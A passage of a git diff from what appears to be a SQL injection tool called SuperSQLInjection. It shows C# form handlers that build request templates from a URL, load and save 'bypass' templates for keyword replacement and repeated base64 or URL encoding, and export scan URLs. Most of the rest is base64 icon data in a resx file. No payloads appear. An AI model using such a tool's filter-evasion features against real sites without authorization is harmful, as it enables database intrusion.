+ config.reaplaceBeforURLEncode = this.chk_reaplaceBeforURLEncode.Checked;
+ }
+
+ private void tsmi_createPackByURL_Click(object sender, EventArgs e)
+ {
+ try {
+ Uri url = new Uri(config.request);
+ this.txt_inject_request.Text=Spider.reqestGetTemplate.Replace("{url}", url.PathAndQuery).Replace("{host}", url.Host+":"+ url.Port);
+ this.txt_basic_host.Text = url.Host;
+ this.txt_basic_port.Text = url.Port.ToString();
+ if (config.request.StartsWith("https")) {
+ this.chk_useSSL.Checked = true;
+ }
+ }catch (Exception ee) {
+ MessageBox.Show("请在数据包中输入正确的URL地址,如:http://www.baidu.com/index.php?id=1");
+ }
+
+ }
+
+ private void tsmi_tsmi_opentestURL_Click(object sender, EventArgs e)
+ {
+ openScanURL(2);
+ }
+
+ private void tsmi_openURL_Click(object sender, EventArgs e)
+ {
+ openScanURL(1);
+ }
+
+ private void bypass_btn_saveTemplate_Click(object sender, EventArgs e)
+ {
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "XML文件|*.xml";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ XML.saveConfig(saveFileDialog.FileName, config);
+ MessageBox.Show("保存模板成功!");
+ }
+ }
+
+ public void loadTemplate(String templatePath) {
+ try
+ {
+ Config template = XML.readConfig(templatePath);
+
+ //bypass
+
this.bypass_chk_inculdeStr.Checked = template.inculdeStr;
+ this.cob_keyRepalce.SelectedIndex = template.keyReplace;
+ this.bypass_chk_base64.Checked = template.base64;
+ this.cbox_base64Count.SelectedIndex = config.base64Count;
+ //替换字符
+ this.chk_reaplaceBeforURLEncode.Checked = template.reaplaceBeforURLEncode;
+ String[] replaceStrs = Regex.Split(template.replaceStrs, "\\n");
+ if (replaceStrs.Length > 0)
+ {
+ foreach (String line in replaceStrs)
+ {
+ String[] strs = Regex.Split(line, "\\t");
+ if (strs.Length == 2)
+ {
+ if (!String.IsNullOrEmpty(strs[0])&& !replaceList.ContainsKey(strs[0]))
+ {
+ this.replaceList.Add(strs[0], strs[1]);
+ ListViewItem lvi = new ListViewItem(strs[0]);
+ lvi.SubItems.Add(strs[1]);
+ lvi.Name = strs[1];
+ this.bypass_lvw_replaceString.Items.Add(lvi);
+ config.replaceStrs += (strs[0] + "\t" + strs[1] + "\n");
+ }
+ }
+ }
+ }
+ MessageBox.Show("加载模板完成!");
+
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("加载模板发生异常!"+e.Message);
+ MessageBox.Show("加载模板发生异常!");
+ }
+ }
+
+ private void bypass_cbox_loadTemplate_TextChanged(object sender, EventArgs e)
+ {
+ if (this.bypass_cbox_loadTemplate.SelectedIndex == 0)
+ {
+ OpenFileDialog ofd = new OpenFileDialog { Filter = "XML文件(*.xml)|*.*" };
+ if (ofd.ShowDialog() == DialogResult.OK)
+ {
+ loadTemplate(ofd.FileName);
+ }
+ }
+ else {
+ String path = AppDomain.CurrentDomain.BaseDirectory + "/config/template/" + this.bypass_cbox_loadTemplate.Text;
+ loadTemplate(path);
+
+ }
+ }
+
+ private void cbox_base64Count_TextChanged(object sender, EventArgs e)
+ {
+ config.base64Count = this.cbox_base64Count.SelectedIndex+1;
+ }
+
+ private void tsmi_tsmi_exortTestURL_Click(object sender, EventArgs e)
+ {
+ exportScanURL(new int[] { 2});
+ }
+
+ private void tsmi_tsmi_exortOldURL_Click(object sender, EventArgs e)
+ {
+ exportScanURL(new int[] {1});
+ }
+
+ private void cbox_bypass_urlencode_count_TextChanged(object sender, EventArgs e)
+ {
+ config.urlencodeCount =
this.cbox_bypass_urlencode_count.SelectedIndex + 1;
+ }
+ }
+}
\ No newline at end of file
diff --git a/SuperSQLInjection/Main.resx b/SuperSQLInjection/Main.resx
new file mode 100644
index 0000000..f60ea5a
--- /dev/null
+++ b/SuperSQLInjection/Main.resx
@@ -0,0 +1,414 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + 142, 6 + + + 9, 6 + + + 531, 14 + + + + AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w + LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 + ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAAAC + EwAAAk1TRnQBSQFMAgEBCgEAARgBBgEYAQYBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo + AwABQAMAATADAAEBAQABCAYAAQwYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA + AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5 + AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA + AWYDAAGZAwABzAIAATMDAAIzAgABMwFmAgABMwGZAgABMwHMAgABMwH/AgABZgMAAWYBMwIAAmYCAAFm + AZkCAAFmAcwCAAFmAf8CAAGZAwABmQEzAgABmQFmAgACmQIAAZkBzAIAAZkB/wIAAcwDAAHMATMCAAHM + AWYCAAHMAZkCAALMAgABzAH/AgAB/wFmAgAB/wGZAgAB/wHMAQABMwH/AgAB/wEAATMBAAEzAQABZgEA + ATMBAAGZAQABMwEAAcwBAAEzAQAB/wEAAf8BMwIAAzMBAAIzAWYBAAIzAZkBAAIzAcwBAAIzAf8BAAEz + AWYCAAEzAWYBMwEAATMCZgEAATMBZgGZAQABMwFmAcwBAAEzAWYB/wEAATMBmQIAATMBmQEzAQABMwGZ + AWYBAAEzApkBAAEzAZkBzAEAATMBmQH/AQABMwHMAgABMwHMATMBAAEzAcwBZgEAATMBzAGZAQABMwLM + AQABMwHMAf8BAAEzAf8BMwEAATMB/wFmAQABMwH/AZkBAAEzAf8BzAEAATMC/wEAAWYDAAFmAQABMwEA + AWYBAAFmAQABZgEAAZkBAAFmAQABzAEAAWYBAAH/AQABZgEzAgABZgIzAQABZgEzAWYBAAFmATMBmQEA + AWYBMwHMAQABZgEzAf8BAAJmAgACZgEzAQADZgEAAmYBmQEAAmYBzAEAAWYBmQIAAWYBmQEzAQABZgGZ + AWYBAAFmApkBAAFmAZkBzAEAAWYBmQH/AQABZgHMAgABZgHMATMBAAFmAcwBmQEAAWYCzAEAAWYBzAH/ + AQABZgH/AgABZgH/ATMBAAFmAf8BmQEAAWYB/wHMAQABzAEAAf8BAAH/AQABzAEAApkCAAGZATMBmQEA + 
AZkBAAGZAQABmQEAAcwBAAGZAwABmQIzAQABmQEAAWYBAAGZATMBzAEAAZkBAAH/AQABmQFmAgABmQFm + ATMBAAGZATMBZgEAAZkBZgGZAQABmQFmAcwBAAGZATMB/wEAApkBMwEAApkBZgEAA5kBAAKZAcwBAAKZ + Af8BAAGZAcwCAAGZAcwBMwEAAWYBzAFmAQABmQHMAZkBAAGZAswBAAGZAcwB/wEAAZkB/wIAAZkB/wEz + AQABmQHMAWYBAAGZAf8BmQEAAZkB/wHMAQABmQL/AQABzAMAAZkBAAEzAQABzAEAAWYBAAHMAQABmQEA + AcwBAAHMAQABmQEzAgABzAIzAQABzAEzAWYBAAHMATMBmQEAAcwBMwHMAQABzAEzAf8BAAHMAWYCAAHM + AWYBMwEAAZkCZgEAAcwBZgGZAQABzAFmAcwBAAGZAWYB/wEAAcwBmQIAAcwBmQEzAQABzAGZAWYBAAHM + ApkBAAHMAZkBzAEAAcwBmQH/AQACzAIAAswBMwEAAswBZgEAAswBmQEAA8wBAALMAf8BAAHMAf8CAAHM + Af8BMwEAAZkB/wFmAQABzAH/AZkBAAHMAf8BzAEAAcwC/wEAAcwBAAEzAQAB/wEAAWYBAAH/AQABmQEA + AcwBMwIAAf8CMwEAAf8BMwFmAQAB/wEzAZkBAAH/ATMBzAEAAf8BMwH/AQAB/wFmAgAB/wFmATMBAAHM + AmYBAAH/AWYBmQEAAf8BZgHMAQABzAFmAf8BAAH/AZkCAAH/AZkBMwEAAf8BmQFmAQAB/wKZAQAB/wGZ + AcwBAAH/AZkB/wEAAf8BzAIAAf8BzAEzAQAB/wHMAWYBAAH/AcwBmQEAAf8CzAEAAf8BzAH/AQAC/wEz + AQABzAH/AWYBAAL/AZkBAAL/AcwBAAJmAf8BAAFmAf8BZgEAAWYC/wEAAf8CZgEAAf8BZgH/AQAC/wFm + AQABIQEAAaUBAANfAQADdwEAA4YBAAOWAQADywEAA7IBAAPXAQAD3QEAA+MBAAPqAQAD8QEAA/gBAAHw + AfsB/wEAAaQCoAEAA4ADAAH/AgAB/wMAAv8BAAH/AwAB/wEAAf8BAAL/AgAD/wEAAfEB7wG8AfMC9AT/ + AvQBkwFvAQcNAAH/AfQiAAHvAfIB9wG8B/8BkwFvAZQBbwwAAfACDgHvIQAB8QH3AfEB9wHxBQABkwFv + ARYBbwEHBQAG/wHyAQ4BQwEUAQ4B8yEAAfEB7wHwAe8B8QMAAZMBbwEWAW8BGgUAAv8B8QHvAewB7QH3 + AewBEQIUAQ4B/yIAAfEB7wG8Ae8B8QEAAZMBbwEWAW8BGgUAAf8B9AEHAe8B8AHzAfIB8AH3AW0BEwEP + AQckAAHxAe8BvAEHAbwBbwHjAW8BGgYAAf8CBwHwAbQCiwG0AfABBwFtAe8mAAHxAQcBbwFFAeMBFgEa + BwAB8gHvAfEBigSyAa0B8gHvAfInAAHxAUYBlAFGAbwIAAEHAfEBtAGzBbIBtAHxAQcnAAEHARwCbwEH + Au8BBwHwAf8DAAH3AfQGswGyAbMB9AH3JgACBwG8AfIBvAIHArwCBwH/AgAB7wH0AbMBuQazAfQB7yUA + AQcCvAEAAf8BvAIHAbwB7wHxAQcB8QIAAQcB8gG6AbkB2wHaAtsBuQG6AfIBByQAAQcCvAMAAfACvAHv + AfMBBwHyAfACAAHzAQcB9AGzBNsBswHzAQcB8yIAAfEBBwLwBAAB8QHwAe8B8wEAAf8B8AHxAwAB8QHw + AfMBugG0AroB8wLxIwABvAHzAfAFAAHyAbwB8QHvAf8BAAL/AwAB/wHxAQcB8wH0Af8B8wG8AfEB/yMA + AfIB8QHyBQAB/wHxAfAB8gG8Af8HAAHzAfACBwHwAfMuAAH/AfMC8QH/NAAB/wG0AgABBwgSAQcQ/wES + 
BBUB/wFDASoC/wHvAhUBEhIAAbUEzwEAAeoI/wHqAf8O1AH/AW0F/wEqAfYCIwP/AW0SAAHPAQAB/wG0 + AgABbQH/AvQE8wH/AW0B/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AW0B/wPzAf8BKgH2AcMBegGm + Av8BbQIAAuwEAAPsBAAC7AEAAc8FAAFtAf8B9AXzAf8BbQH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHU + Af8BbQH/A/QC/wEqAXoBswHTAaYB/wEHAgAB7AH/BOwB/wHsAf8E7AH/AewHAAHrAf8G8wH/AesB/wHU + AhkB9AL/AfQBGQEJA9wBCQHUAf8B6wH/BPQB/wEqAQkB4gGzAdMBpgL/AQAB7AX/AewB/wHsBf8B7AEA + AbsFbAHsAf8G8wH/AewB/w7UAf8B6wH/BPQC/wGsAQkB4gGzAdMBpgL/AewG/wHsBv8B7AEAAYsFGQHs + Af8G8wH/AewB/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AesB/wX0Av8BrAEJAeIBswHTAaYB/wHs + Af8B7AH/AewB/wHsAf8B7AX/AewBAAGLBRkB7AH/BPMD/wHsAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHb + AdQB/wHrCf8BrAEJAeIBswEmASAB7AL/AewD/wHsBv8B7AEAAZAFGQHtAf8E8wH/Au0B8AH/AdQC3AEZ + AvQBGQHcAdsB2gHTAdQB2wHUAf8B7Ar/AawBCQH/ASYBIAHsAf8B7AP/AewB/wHsBf8B7AEAAZAFGQGS + Bv8BkgEHAQAB/wHUAhkB9AL/AfQBGQEJA9wBCQHUAf8B7Av/AawBJgHeASUB7AL/AuwC/wHsBv8B7AEA + AbMFGQEHBvcB8AIAAf8O1AH/AewJ/wL0Af8BJQEgAf8B7AH/AewD/wHsAf8B7AX/AewBAAGzBRkCCQEZ + AbMGAAH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8B7Aj/AbUC6gEHA/8B7AL/AuwC/wHsBv8B7AEA + AbkEGQEJAxkBuQQAAc8BAAH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8B7Aj/AbUD/wH3AgAC7AT/ + AewB/wHsBP8C7AEAAbkDGQIJARkCuQEJAf8BtAIAAc8BAAH/AdQCGQH0Av8B9AEZAQkD3AEJAdQB/wHs + CP8BtQL/AfcFAATsAQAB7AEABOwDAAG5BhkBuQG6AQAEzwG1AQAB/w7UAf8B7Qj/AbUB/wH3FAABCQa5 + AQkCAAH/AbQEABD/Cu0B90gAAvABvAHvApEB7wG8AvAHAAEHAXIBTwNJAXIBBwUADv8DAAG8DAABBwIA + AbwBBwH3Ae8BswLbAbMC7wEHAbwFAAGYAU8BUASYAU8BSQEcBAABBwzrAQcCAAHzAQACBwr/AgAB8AG7 + ArMBkAG6AtsBugGQArMBuwHwAwABmAFPAXgBCAGYApcBmAEIAZcBSQEcAwAB6wwHAesFAAP0CP8CAAHw + AbQC3AbbAtwBtAHwAgABBwFPAXgBCAaXAQgBlwFJAQcCAAHsAbwKDwG8AewCAAHzAQACBwP0B/8CAAG8 + AbMB3ALbAdwC2wHcAtsB3AGzAbwCAAF4AVYBCAKXAXgBGwGYA5cBCAFPAXICAAHsAfAKEAHwAewFAAP0 + AesBDgEQAewBEQP/AQABvAHvAbQD2wGzAroBswPbAbQB7wG8AQABUAKYAZcBeAP/AZgClwKYAU8CAAHs + AfEBEAIRAv8BEQH/AhEBEAHxAewCAAHzAQACBwH0AfABAAHwAfQB7QEAA/8BAAEHAbMBugHbAdwBswG8 + AgABvAGzAdwB2wG6AbMBBwEAAU8BmAGXAXgC/wH0Av8BmAKXAZgBSQIAAewB8QERAUMB/wZDAREB8QHs + 
BQAC8wHyAQ4B7AHzAbwBAAH0Av8BAAG7AdsC3AHbAbQEAAG0AdsC3AHbAbsBAAFVAQgBeAGXAQgB8QGX + AQgC/wGYAZcBmAFPAgAB7AHyAREBFQH/AxUB/wIVAREB8gHsAgAB8wEAAQcB7wLzAQcBEwEOAQ8BAAL0 + Af8BAAG7AdsD3AG0AbwC8AG8AbQD3AHbAbsBAAFWApgFlwEIAf8B8wKYAU8CAAHsAfMBQwIVAv8EFQFD + AfMB7AUAA/MBvAHyAfQB7AEQA/QBAAG8AbMC2wHcAbMBkgIHAZIBswHcAtsBswG8AQABmAGXAQgGlwEI + AZcBCAFQAZcCAAHsAfQBQwgUAUMB9AHsAgAB8wEAAQcB7wLzAewBDwEOAREB7wP0AgABvAG0AdsB4QHc + AbMCkAGzAdwB4QHbAbQBvAIAAQgBVgF4AQgGlwEIAXgBTwEHAgAB7QH/CkMB/wHtBQAB8gfzA/QCAAG8 + AbMBGQPhAtwD4QEZAbMBvAMAAZgBVgF4AQgBmAJ4AZgBCAF4AU8BmAMAAe0M/wHtAgAB8wEAAQcB7wLy + BvMC9AMAAbQB3AHiAtsC4QLbAeIB3AG0BQABmAFWAZcEmAGXAVABmAQAAfAM7QHwBQAE8gfzAwABuwG0 + AbMBtAHbAuIB2wG0AbMBtAG7BgABCAGYBFYBmAEHFQAB8wEADP8FAAK8AbMC2wGzArwmAAG8DAABvAYA + AbwCuwG8BgABQgFNAT4HAAE+AwABKAMAAUADAAEwAwABAQEAAQEFAAGAAQEWAAP/AgABAQH/AfMFAAEB + Af8B4QQAAQcBwQHwBQACgwHgBQABwQEHAcABAQQAAeABDwHAAQMEAAHwAR8BwAEDBAAB+AE/AcABAwQA + AfgBAQHAAQMEAAHwAQABwAEDBAAB4gEAAcABAwQAAccBAAHAAQMEAAEPAQgB4AEHBAABHwEEAeABBwQA + AR8BAwH4AR8EAAH/AYMC/wQAAcwEAAEDAv8BBAQAAQMC/wFMBAABAwE8AXkBfAQAAQMBAAEBAfwEAAEB + AQABAQcAAQEHAAEBBwABAQcAAQEBAAEBBQABAQEAAQMFAAEBAQABPwUAAQEBAAE9AwABAwEAAQEBAAEN + AwABBwHCAYcBAAFBAwABDwL/AQABzwMAAR8I/wHgAQcB8AEPAYABAQHAAQABwAEDAeABBwGAAQEBgAEA + AYABAQHAAQMBgAEBAYABAAGAAQEBgAEBAYABAQGAAQABgAEBAYABAQGAAQEBgAMAAYABAQGAAQEBgAEA + AQECgAEBAYABAQGAAQABAwHAAYABAQGAAQEBgAMAAYABAQGAAQEBgAMAAYABAQGAAQEBgAEAAYABAQGA + AQEBgAEBAYABAAGAAQEBwAEDAYABAQGAAQABwAEDAeABBwGAAQEBgAEAAcABAwHwAQ8C/wGAAQAB8AEP + BP8BwAEAAfwBPws= + + + + 279, 9 + + + 1218, 14 + + + 157, 52 + + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + 
VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + + iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8 + YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG + YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9 + 0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw + bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc + VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9 + c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32 + Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo + 
mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+ + kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D + TgDQASA1MVpwzwAAAABJRU5ErkJggg== + + + + 404, 11 + + + 267, 52 + + + + AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w + LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0 + ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq + DQAAAk1TRnQBSQFMAgEBBwEAAZgBBQGYAQUBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo + AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA + AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5 + AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA + AWYDAAGZAwABzAIAATMDAAIzAgABMwFmAgABMwGZAgABMwHMAgABMwH/AgABZgMAAWYBMwIAAmYCAAFm + AZkCAAFmAcwCAAFmAf8CAAGZAwABmQEzAgABmQFmAgACmQIAAZkBzAIAAZkB/wIAAcwDAAHMATMCAAHM + AWYCAAHMAZkCAALMAgABzAH/AgAB/wFmAgAB/wGZAgAB/wHMAQABMwH/AgAB/wEAATMBAAEzAQABZgEA + ATMBAAGZAQABMwEAAcwBAAEzAQAB/wEAAf8BMwIAAzMBAAIzAWYBAAIzAZkBAAIzAcwBAAIzAf8BAAEz + AWYCAAEzAWYBMwEAATMCZgEAATMBZgGZAQABMwFmAcwBAAEzAWYB/wEAATMBmQIAATMBmQEzAQABMwGZ + AWYBAAEzApkBAAEzAZkBzAEAATMBmQH/AQABMwHMAgABMwHMATMBAAEzAcwBZgEAATMBzAGZAQABMwLM + AQABMwHMAf8BAAEzAf8BMwEAATMB/wFmAQABMwH/AZkBAAEzAf8BzAEAATMC/wEAAWYDAAFmAQABMwEA + AWYBAAFmAQABZgEAAZkBAAFmAQABzAEAAWYBAAH/AQABZgEzAgABZgIzAQABZgEzAWYBAAFmATMBmQEA + AWYBMwHMAQABZgEzAf8BAAJmAgACZgEzAQADZgEAAmYBmQEAAmYBzAEAAWYBmQIAAWYBmQEzAQABZgGZ + AWYBAAFmApkBAAFmAZkBzAEAAWYBmQH/AQABZgHMAgABZgHMATMBAAFmAcwBmQEAAWYCzAEAAWYBzAH/ + AQABZgH/AgABZgH/ATMBAAFmAf8BmQEAAWYB/wHMAQABzAEAAf8BAAH/AQABzAEAApkCAAGZATMBmQEA + AZkBAAGZAQABmQEAAcwBAAGZAwABmQIzAQABmQEAAWYBAAGZATMBzAEAAZkBAAH/AQABmQFmAgABmQFm + ATMBAAGZATMBZgEAAZkBZgGZAQABmQFmAcwBAAGZATMB/wEAApkBMwEAApkBZgEAA5kBAAKZAcwBAAKZ + Af8BAAGZAcwCAAGZAcwBMwEAAWYBzAFmAQABmQHMAZkBAAGZAswBAAGZAcwB/wEAAZkB/wIAAZkB/wEz + 
AQABmQHMAWYBAAGZAf8BmQEAAZkB/wHMAQABmQL/AQABzAMAAZkBAAEzAQABzAEAAWYBAAHMAQABmQEA + AcwBAAHMAQABmQEzAgABzAIzAQABzAEzAWYBAAHMATMBmQEAAcwBMwHMAQABzAEzAf8BAAHMAWYCAAHM + AWYBMwEAAZkCZgEAAcwBZgGZAQABzAFmAcwBAAGZAWYB/wEAAcwBmQIAAcwBmQEzAQABzAGZAWYBAAHM + ApkBAAHMAZkBzAEAAcwBmQH/AQACzAIAAswBMwEAAswBZgEAAswBmQEAA8wBAALMAf8BAAHMAf8CAAHM + Af8BMwEAAZkB/wFmAQABzAH/AZkBAAHMAf8BzAEAAcwC/wEAAcwBAAEzAQAB/wEAAWYBAAH/AQABmQEA + AcwBMwIAAf8CMwEAAf8BMwFmAQAB/wEzAZkBAAH/ATMBzAEAAf8BMwH/AQAB/wFmAgAB/wFmATMBAAHM + AmYBAAH/AWYBmQEAAf8BZgHMAQABzAFmAf8BAAH/AZkCAAH/AZkBMwEAAf8BmQFmAQAB/wKZAQAB/wGZ + AcwBAAH/AZkB/wEAAf8BzAIAAf8BzAEzAQAB/wHMAWYBAAH/AcwBmQEAAf8CzAEAAf8BzAH/AQAC/wEz + AQABzAH/AWYBAAL/AZkBAAL/AcwBAAJmAf8BAAFmAf8BZgEAAWYC/wEAAf8CZgEAAf8BZgH/AQAC/wFm + AQABIQEAAaUBAANfAQADdwEAA4YBAAOWAQADywEAA7IBAAPXAQAD3QEAA+MBAAPqAQAD8QEAA/gBAAHw + AfsB/wEAAaQCoAEAA4ADAAH/AgAB/wMAAv8BAAH/AwAB/wEAAf8BAAL/AgAD/wEAEP8wAA/vAf8PvAUA + AQcBcgFPA0kBcgEHFAAP7wH/D+8EAAGYAU8BUASYAU8BSQEcEwAB7w3/Ae8B/wHvDf8B7wMAAZgBTwF4 + AQgBmAKXAZgBCAGXAUkBHBIAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABBwFPAXgBCAaX + AQgBlwFJAQcRAAHvAf8C3AL/AtwC/wLcAv8B7wH/Ae8C/wncAv8B7wIAAXgBVgEIApcBeAEbAZgDlwEI + AU8BchEAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7w3/Ae8CAAFQApgBlwF4A/8BmAKXApgBTxEAAe8B/wLc + Av8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABTwGYAZcBeAL/AfQC/wGYApcBmAFJEQAB7wH/AtwC/wLc + Av8C3AL/Ae8B/wHvAv8J3AL/Ae8CAAFVAQgBeAGXAQgB8QGXAQgC/wGYAZcBmAFPEQAB7w3/Ae8B/wHv + Df8B7wIAAVYCmAWXAQgB/wHzApgBTxEAAe8B9AvyAfQB7wH/Ae8B9AvyAfQB7wIAAZgBlwEIBpcBCAGX + AQgBUAGXEQABtA2zAbQB/wG0DbMBtAIAAQgBVgF4AQgGlwEIAXgBTwEHEQABswEJC9wBCQGzAf8BswEJ + C9wBCQGzAwABmAFWAXgBCAGYAngBmAEIAXgBTwGYEgABswHhC9sB4QGzAf8BswHhC9sB4QGzBAABmAFW + AZcEmAGXAVABmBMAAbMN4gGzAf8Bsw3iAbMFAAEIAZgEVgGYAQcUAA+zAf8Bug2zAbohABD/IAABEg5D + ARIB/w7UAf8gAAFtDv8BbQH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8BAA4HAgAIBwaXAQABbQH/ + ARUEEQEQAxEBEAERARQB/wFtAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/ + AQcCAAEHAv8BBwT/AZcECAGXAQABbQH/AeoC/wG8A/8BvAP/AeoB/wFtAf8B1AIZAfQC/wH0ARkBCQPc + 
